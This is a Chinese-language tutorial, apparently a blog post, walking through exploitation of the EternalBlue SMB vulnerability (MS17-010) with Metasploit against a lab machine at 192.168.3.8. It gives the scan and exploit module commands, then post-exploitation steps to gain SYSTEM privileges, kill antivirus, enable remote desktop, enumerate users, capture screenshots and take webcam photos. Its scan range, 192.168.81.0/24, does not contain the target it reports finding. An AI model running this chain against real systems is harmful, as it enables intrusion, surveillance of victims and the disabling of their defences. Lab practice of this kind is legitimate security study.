1、原理 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
我们需要一个有永恒之蓝漏洞的系统
靶机为 192.168.3.8
2.CVE-2017-0144 利用方法
1 启动Metasploit
终端里输入 msfconsole
2 查询利用模块
终端里输入 search ms17_010
3 使用探测模块
终端内输入 use auxiliary/scanner/smb/smb_ms17_010
4 设置探测范围
终端内输入 options
从上面的图片我们发现 只需要 设置一个 RHOST
终端内输入 set rhosts 192.168.81.0/24 (设置扫描当前网段 可以通过 在终端内输入ip a 查看)
也可以设置范围 set rhosts 192.168.81.1-192.168.81.254
run 一下
根据上图我们可以看到 192.168.3.8 这个IP的机器可能存在漏洞
6 开始漏洞利用
开始利用首先在终端里输入 search ms17_010
使用 模块 use exploit/windows/smb/ms17_010_eternalblue
7 配置利用模块
配置模块 show options 配置靶机 set rhost 192.168.3.8 这里IP填第五步探测到的IP
8 执行攻击
在终端里输入 run
知道咱们看到 win 则攻击成功 拿到meterpreter
9 后渗透操作
查看进程:ps 查看当前进程号:getpid 查看系统信息:sysinfo 查看目标机是否为虚拟机:run post/windows/gather/checkvm 查看完整网络设置:route 查看当前权限:getuid 自动提权:getsystem 关闭杀毒软件:run post/windows/manage/killav 启动远程桌面协议:run post/windows/manage/enable_rdp 列举当前登录的用户:run post/windows/gather/enum_logged_on_users 查看当前应用程序:run post/windows/gather/enum_applications 抓取目标机的屏幕截图:load espia ; screengrab 抓取摄像头的照片:webcam_snap 查看当前处于目标机的那个目录:pwd 查看当前目录:getlwd
661
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
